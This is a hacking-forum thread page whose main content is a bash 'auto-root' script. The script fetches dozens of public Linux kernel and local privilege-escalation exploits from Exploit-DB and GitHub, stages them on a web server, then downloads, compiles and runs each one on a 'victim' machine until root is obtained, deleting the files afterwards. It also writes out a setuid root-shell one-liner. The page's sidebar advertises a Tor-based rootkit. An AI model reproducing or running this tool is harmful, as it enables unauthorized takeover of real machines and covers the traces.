          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/40871.c 
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/15024.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/24746.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c 
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c

          # Getting 32-bit only exploit to lin_x86 directory
          cd /var/www/html/exploits/lin_x86/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux_x86/local/9542.c

          # Getting the compressed exploits to sploits directory
          cd /var/www/html/exploits/sploits

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/39772.zip
          sudo wget --no-check-certificate $saddress/bin-sploits/29714.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/33395.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/40489.zip

          # Getting CVE-2016-2384 exploit to gitex directory 
          cd /var/www/html/exploits/gitex

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gitaddress/poc.c
          sudo wget --no-check-certificate $gitaddress/poc.py
      }

      function valid_ip()
      {
          if ! [ "$2" ]; then
              echo -e "${red}${bold}IP Not Provided, Please provide an IP"
          else
              if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

                  for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
                  do
                    (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
                  done
              else
                  echo -e "${light_green}========================================"
                  echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
                  echo -e "========================================"
                  exit 1;
              fi
          fi
      }

      #gaddress=$1'/exploits'
      #saddress=$1'/exploits'
      #gitaddress=$1'/exploits/gitex'
      function exploiter(){

          checkroot() {
              if [ $(id -u) == 0 ]; then
              echo
              echo -e "${light_red}Successfully R00T(ed).. have fun :)"
              id=$(id)
              echo -e "${light_red}ID     => ${light_green}" $id
              who=$(whoami)
              echo -e "${light_red}WHOAMI => ${light_green}" $who
              exit
              else
              echo ""
              echo -e "${light_red}R00Ting.. ${light_green}"
              sleep 1
              fi
          }
          ccmpl(){
              gcc exploit.c -o exploit -lutil -lpthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -m32 -O2 -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -O2 -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -lkeyutils -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -lpthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -pthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -static -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -fPIC -shared -o exploit exploit.c -ldl -w
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -O2 exploit.c
              gcc -O2 -fomit-frame-pointer exploit.c -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -o exploit exploit.c -static -O2
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -pthread exploit.c -o exploit -lcrypt
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -Wall -m64 -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -Wall -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
          }
          shcmpl(){
              bash exploit.sh
              rm exploit.sh
              rm *.c
              checkroot;
          }
          pycmpl(){
              python exploit.py
              rm exploit.py
              rm *.c
              checkroot;
          }
          echo -e "${light_red}Auto R00Ting started...${light_green}"

          checkroot;
          #c
          wget --no-check-certificate $gaddress/linux/local/2031.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/17391.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/18411.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33321.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/35161.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/40871.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/5092.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8572.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86/local/9542.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/25202.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33322.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40812.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/37292.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2013.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/5093.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8673.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/10613.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40003.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2004.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/15024.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/15704.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/25444.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/30604.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33824.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41994.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2005.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/15285.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41995.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2006.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40616.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/24746.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33336.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39166.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41886.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/1397.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/27297.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39277.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/718.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8678.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41458.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40839.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/35370.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/38390.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39230.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/42183.c -O exploit.c
          ccmpl;

          #sh
          wget --no-check-certificate $gaddress/linux/local/2011.sh -O exploit.sh
          shcmpl;
          wget --no-check-certificate $gaddress/linux/local/8478.sh -O exploit.sh
          shcmpl;
          wget --no-check-certificate $gaddress/linux/local/10018.sh -O exploit.sh
          shcmpl;

          #py
          wget --no-check-certificate $gaddress/linux/local/9844.py -O exploit.py
          pycmpl;
          wget --no-check-certificate $gaddress/linux/local/12130.py -O exploit.py
          pycmpl;

          #txt
          #platforms/linux/local/9191.txt
          wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          tar -zxf 9191.tgz
          cd cheddar_bay
          bash cheddar_bay.sh
          cc -fno-stack-protector -o exploit exploit.c
          ./exploit
          cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
          ./exploit
          cd ..
          rm -rf cheddar_bay
          rm -rf 9191.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          checkroot;
          #platforms/linux/local/39772.txt
          wget --no-check-certificate $saddress/bin-sploits/39772.zip
          cd 39772
          unzip 39772.zip
          tar -xf exploit.tar
          cd ebpf_mapfd_doubleput_exploit
          bash compile.sh
          ./hello
          ./doubleput
          ./suidhelper
          cd ..
          rm -rf ebpf_mapfd_doubleput_exploit
          rm -rf exploit.tar
          checkroot;
          tar -xf crasher.tar
          cd ebpf_mapfd_doubleput_crasher
          bash compile.sh
          ./doubleput
          cd ..
          rm -rf ebpf_mapfd_doubleput_crasher
          rm -rf 39772
          rm -rf 39772.zip
          checkroot;
          #platforms/linux/local/23674.txt
          smbmount --version
          ls -l /usr/bin/smbmount
          ls -l /usr/bin/smbmnt
          echo "main(){setuid(0);setgid(0);system("/bin/bash");}" > a.c
          make a
          cc a.c -o a
          chmod +s a
          share:/etc/samba/smb.conf
          /etc/samba/smb.conf
          [share]
          path = /data/share
          writable = no
          locking = no
          public = yes
          guest ok = yes
          comment = Share
          ls -l a
          ls -l pokus/a
          id
          checkroot;
          #platforms/linux/local/29714.txt
          wget --no-check-certificate $saddress/bin-sploits/29714.tgz
          tar -zxf 29714.tgz
          cd exploit
          make
          make install
          cd ..
          rm -rf exploit
          rm -rf 29714.tgz
          checkroot;
          wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          tar -zxf 9191.tgz
          cd cheddar_bay
          bash cheddar_bay.sh
          cc -fno-stack-protector -o exploit exploit.c
          ./exploit
          cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
          ./exploit
          cd ..
          rm -rf cheddar_bay
          rm -rf 9191.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          checkroot;
          #platforms/linux/local/33395.txt
          wget $saddress/bin-sploits/33395.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          checkroot;
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          #platforms/linux/local/40489.txt
          wget --no-check-certificate $saddress/bin-sploits/40489.zip
          unzip 40489.zip
          cd 40489
          bash compile.sh
          ./pwn
          ./enjoy
          cd ..
          rm -rf 40489
          rm -rf 40489.zip
          checkroot;
          #platforms/linux/local/41770.txt
          # #!/bin/bash
          # (./ProcReadHelper /proc/$$/syscall) &
          # sleep 1
          # exec /usr/bin/passwd
          # #!/bin/bash
          # echo "Current pid is $$"
          # (sleep 10; echo 127 ) > /proc/$$/coredump_filter &
          # sleep 5
          # exec /usr/bin/passwd
          # static ssize_t mem_read(struct file * file, char __user * buf,
          #                         size_t count, loff_t *ppos) {
          #     if (file->private_data != (void*)((long)current->self_exec_id))
          #         goto out_put;
          # #!/bin/bash
          # (sleep 3; echo 15) > /proc/$$/oom_adj &
          # exec /usr/bin/passwd
          # checkroot;
          #platforms/linux/local/38559.txt
          rmmod b43
          modprobe b43 fwpostfix=AA%xBB
          dmesg
          checkroot;
          #platforms/linux/local/41999.txt
          wget --no-check-certificate $gitaddress/poc.c -O poc.c
          gcc poc.c -masm=intel
          ./a.out 0
          checkroot;
          ./a.out 1
          checkroot;
          ./a.out 2
          checkroot;
          ./a.out 3
          checkroot;
          ./a.out 4
          checkroot;
          ./a.out 5
          checkroot;
          ./a.out 6
          checkroot;
          ./a.out 7
          checkroot;
          ./a.out 8
          checkroot;
          ./a.out 9
          checkroot;
          ./a.out 10
          checkroot;
          rm a.out
          rm poc.c
          wget --no-check-certificate $gitaddress/poc.py -O poc.py
          python poc.py
          checkroot;
          rm poc.py
          rm a.out
          rm exploit
          
          echo -e "${light_red}Srry.. I tried hard, but no luck this time.. Wait for update :("
          exit 1;
      }


      if ! [ "$1" ] || [ "$1" == '-h' ]  || [ "$1" == '--help' ] ; then #|| ! [ "$2" ]; then
          lauto_root
          desc
      fi

      if [ "$1" == '-a' ] || [ "$1" == '--arsenal' ] ; then
          lauto_root
          sleep 2 
          echo -e "\n${light_green}=================================="
          echo -e "#   ${light_red}Initiating Arsenal script   ${light_green} #"
          echo -e "==================================\n"
          # original line gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms'
          gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
          # original line saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master'
          saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-6074'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308'
          local_dir
          arsenal
          echo -e "${light_green}=========================="
          echo -e "#   ${light_red}Local Arsenal Set..  ${light_green}#"
          echo -e "==========================\n"
          echo -e "${light_green}=========================="
          echo -e "#   ${light_red}Starting Apache2     ${light_green}#"
          echo -e "==========================\n"
          /bin/bash -i /etc/init.d/apache2 start
          /bin/bash -i /etc/init.d/apache2 status
          echo -e "${light_green}=================================="
          echo -e "#    ${light_red}Run Exploiter on Victim     ${light_green}#"
          echo -e "==================================\n"

          exit 1;
      fi 

      if [ "$1" == '-l' ] || [ "$1" == '--Lroot' ] ; then
          lauto_root
          if ! [ "$2" ]; then
              echo -e "\n${light_red}No IP address provided!!!\n"
              exit 1;
          else     
              ip=$2
          fi

          if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

              for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
              do
                (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
              done
          else
              echo -e "${light_green}========================================"
              echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
              echo -e "========================================\n"
          fi    

          sleep 2 
          echo -e "${light_green}=================================="
          echo -e "#   ${light_red}Initiating Local Exploiter   ${light_green}#"
          echo -e "==================================\n"
          gaddress='http://'${ip}'/exploits'
          saddress='http://'${ip}'/exploits'
          gitaddress='http://'${ip}'/exploits/gitex'
          exploiter
          exit 1;
      fi

      if [ "$1" == '-r' ] || [ "$1" == '--Rroot' ] ; then
          lauto_root
          gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
          saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
          sleep 2 
          echo -e "${light_green}==================================="
          echo -e "#   ${light_red}Initiating Remote Exploiter   ${light_green}#"
          echo -e "===================================\n"
          exploiter
          exit 1;
      fi


       

      thanks for share

      Excellent a fellow bash coder, add me => MODERATED BY ADMIN (jabber)

      Ive got some "HQ" stuff to show you.

      Edited by dEEpEst
      No emails in public

      Share this post

      Link to post
      Share on other sites

      bash818    230

      bash818
      Posted
      10 hours ago, bash818 said:

      Excellent a fellow bash coder, add me => MODERATED BY ADMIN (jabber)

      Ive got some "HQ" stuff to show you.

      Its a jabber..

      Share this post

      Link to post
      Share on other sites

      dEEpEst    35,722

      dEEpEst
      Staff
      Posted
      hace 2 horas, bash818 dijo:

      Its a jabber..

      @bash818 You can not put emails in the forum, or jabbers or anything similar. If you want to contact him use the private message.
      You should know the rules.:close_tema:

      Share this post

      Link to post
      Share on other sites
      Guest
      This topic is now closed to further replies.
      Go To Topic Listing

      • Similar Content

        • itsMe
          Kali Linux 2021.3a - Penetration Testing and Ethical Hacking Linux Distribution
          By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. Kali Linux 2021.3a
          Kali contains a vast array of hacker tools and utilities (password attacks, sniffing and spoofing, reverse engineering, ...). Hacking foreign WiFi/WLAN (wireless attacks) and more. Kali is designed for digital forensics and penetration testing.
          Kali is preinstalled with numerous penetration-testing programs, including nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), and Aircrack-ng (a software suite for penetration-testing wireless LANs). Kali can be run from a hard disk, live DVD, or live USB.
          The most advanced penetrating testing distribution, ever.
          Kali, the most advanced and versatile penetration testing distribution ever created. Kali has grown far beyond its humble roots as a live DVD and has now become a full-fledged operating system.
          Note: Kali is Linux based, but suitable for all Windows versions.

          Hidden Content
          Give reaction to this post to see the hidden content.
        • itsMe
          Tor Rootkit: Python 3 standalone Windows 10 / Linux Rootkit
          By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. A Python 3 standalone Windows 10 / Linux Rootkit. The networking communication get’s established over the tor network.
          Features
              Standalone executable, including python interpreter and tor
              The executable has a size of ~13MB on Windows and ~7MB on Linux
              the whole communication works over tor hidden services which guarantees some degree of anonymity
              The Listener can handle multiple clients
              The Client auto reconnects when an unexpected closed connection occurs
              The Listener generates payloads for different platforms on the startup

          Hidden Content
          Give reaction to this post to see the hidden content.
        • itsMe
          Security Onion 2.3.80 - Linux distro for intrusion detection
          By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. Security Onion
          Security Onion is a free and open source Linux distribution for intrusion detection, enterprise security monitoring, and log management. It includes Elasticsearch, Logstash, Kibana, Snort, Suricata, Bro, OSSEC, Sguil, Squert, NetworkMiner, and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes!
          Below are several diagrams to represent the current architecture and deployment scenarios for Security Onion on the Elastic Stack.
          Core Components
          Logstash – Parse and format logs.
          Elasticsearch – Ingest and index logs.
          Kibana – Visualize ingested log data.
          Auxiliary Components
          Curator – Manage indices through scheduled maintenance.
          ElastAlert – Query Elasticsearch and alert on user-defined anomalous behavior or other interesting bits of information.
          FreqServer -Detect DGAs and find random file names, script names, process names, service names, workstation names, TLS certificate subjects and issuer subjects, etc.
          DomainStats – Get additional info about a domain by providing additional context, such as creation time, age, reputation, etc.
          Changelog v2.3.80
              FEATURE: Ability to disable Zeek, Suricata #4429
              FEATURE: Add docs link to Setup #5459
              FEATURE: Add evtx support in Import Node #2206
              FEATURE: Consolidate whiptail screens when selecting optional components #5456
              FEATURE: Distinguish between Zeek generated syslog and normal syslog in hunt for event fields #5403
              FEATURE: Enable index sorting to increase search speed #5287
              FEATURE: Expose options for elasticsearch.yml via Salt pillar #1257
              FEATURE: Role-based access control (RBAC) #5614
              FEATURE: soup -y for automation #5043
              FIX: Add new default filebeat module indices to the global pillar. #5526
              FIX: all.rules file can become empty on non-airgap deployments if manager does not have access to the internet. #3619
              FIX: Curator cron should run less often #5189
              FIX: Improve unit test maintainability by refactoring to use Golang assertion library #5604
              FIX: Invalid password message should also mention dollar signs are not allowed #5381
              FIX: Max files for steno should use a pillar value for easy tuning. #5393
              FIX: Remove raid check for official cloud appliances #5449
              FIX: Remove watermark settings from global pillar. #5520
              FIX: SOC Username case sensitivity #5154
              FIX: so-user tool should validate password before adding user to SOC #5606
              FIX: Switch to new Curator auth params #5273
              UPGRADE: Curator to 5.8.4 #5272
              UPGRADE: CyberChef to 9.32.2 #5158
              UPGRADE: SOC UI 3rd Party dependencies to latest versions #5603
              UPGRADE: Zeek to 4.0.4 #5630

          Hidden Content
          Give reaction to this post to see the hidden content.
        • dEEpEst
          Information Gathering Using Harvester In Linux
          By dEEpEst
          Tool To Be Used: Harvester
          Today we will learn about Information Gathering using theHarvester in Kali Linux. Good information gathering can make the difference between a successful penetration test and one that has failed to provide maximum benefit to the client.
          TheHarvester has been developed in Python by Christian Martorella. It is a tool which provides us information about e-mail accounts, user names and hostnames/subdomains from different public sources like search engines and PGP key server.
          This tool is designed to help the penetration tester on an earlier stage; it is an effective, simple and easy to use.
          The sources supported are:
          Google – emails, subdomains
          Google profiles – Employee names
          Bing search – emails, subdomains/hostnames, virtual hosts
          Pgp servers – emails, subdomains/hostnames
          LinkedIn – Employee names
          Exalead – emails, subdomain/hostnames
          New features:
          Time delays between requests
          XML results export
          Search a domain in all sources
          Virtual host verifier
          Let’s get started,
          If you are using Kali Linux, open the terminal and type theharvester
          If not then it can be easily downloaded from here: 
          Hidden Content
          Give reaction to this post to see the hidden content. Simply Download and extract it
          Provide execute permission to: theHarvester.py by [chmod 755 theHavester.py]
          Then simply run  ./theharvester
          You will see similar to this:
            Here I am using kali linux.
          Tutorial:

          Hidden Content
          Give reaction to this post to see the hidden content.
        • itsMe
          Kali Linux 2021.3 - Penetration Testing and Ethical Hacking Linux Distribution
          By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. The Most Advanced
          Penetration Testing Distribution
          Kali Linux is an open-source, Debian-based Linux distribution geared towards various information security tasks, such as Penetration Testing, Security Research, Computer Forensics and Reverse Engineering.
          Today we have released the newest version of Kali Linux, 2021.3 (quarter #3), which is now ready for download or updating. A summary of the changes since the 2021.2 release from June are: OpenSSL - Wide compatibility by default - Keep reading for what that means New Kali-Tools site - Following the footsteps of Kali-Docs, Kali-Tools has had a complete refresh Better VM support in the Live image session - Copy & paste and drag & drop from your machine into a Kali VM by default New tools - From adversary emulation, to subdomain takeover to Wi-Fi attacks Kali NetHunter smartwatch - first of its kind, for TicHunter Pro KDE 5.

          Hidden Content
          Give reaction to this post to see the hidden content.